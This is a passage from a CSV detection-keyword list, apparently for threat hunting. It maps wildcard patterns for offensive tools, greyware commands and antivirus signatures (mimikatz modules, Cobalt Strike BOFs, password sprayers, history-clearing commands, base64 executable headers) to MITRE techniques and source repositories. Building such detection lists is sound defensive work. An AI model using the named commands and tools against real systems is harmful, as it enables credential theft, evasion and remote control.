Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray/existent_users.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray/valid_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-dev*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-master*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-trevorspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*tricks01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*trickster0/Enyx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*tricky.lnk*","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","105","38","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" +"*TROJ_ZIPBOMB.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Trojan.Linux*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan.Win32.*.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan.WinGo*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan/Win32*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan/Win64*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:PowerShell*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","trojan powershell signatures","10","10","N/A","N/A","N/A","N/A" +"*Trojan:Win32*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:Win32/IceId*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:Win32/Trickbot*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:Win64*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:Win64/IceId*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*TrojanDropper:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*TrojanSpy:MSIL/JSSLoader*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*TrojanSpy:MSIL/JSSLoader*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*truecrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*True-Demon*","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/True-Demon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*trufflehog git *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*truffleHog*","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1083 - T1081 - T1213 - T1212","TA0002 - TA0003 - TA0004 - TA0007","N/A","N/A","Information Gathering","https://github.com/dxa4481/truffleHog","1","0","N/A","N/A","10","12176","1422","2023-10-04T20:56:03Z","2016-12-31T05:08:12Z" +"*TruffleSnout.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*truncate -s0 *bash_history'*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*--trusted-for-delegation --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*TrustedPath-UACBypass-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*trustedsec/social-engineer-toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*trustedsec/unicorn*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*TryCatchHCF*","offensive_tool_keyword","Github Username","github repo hosting sniffing spoofing and data exfiltration tools","N/A","N/A","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ts.php*vi.txt*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ts::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::mstsc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::multirdp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::remote*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::sessions*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*tshark *-i *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tshark -f *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tshark -Q*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tshark -r *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tshark*.deb*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tspkg/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*ttyd -i 0.0.0.0 -p 7681 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*ttyd -i 0.0.0.0 -p 7682 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*TunnelGRE/Augustus*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" +"*tunnels-prod-rel-tm.trafficmanager.net*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*turn_keylogger*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*twint -g=*km* -o * --csv*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*twint -u * --since *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*twittor.py*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*twittor-master.zip*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Tycx2ry/SweetPotato*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"*Tylous/SourcePoint*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*TypeError/domained*","offensive_tool_keyword","domained","A domain name enumeration tool","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/TypeError/domained","1","1","N/A","N/A","8","719","164","2021-04-11T09:54:50Z","2017-08-18T00:03:39Z" +"*U2hlbGxjb2RlIFBhdGg=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 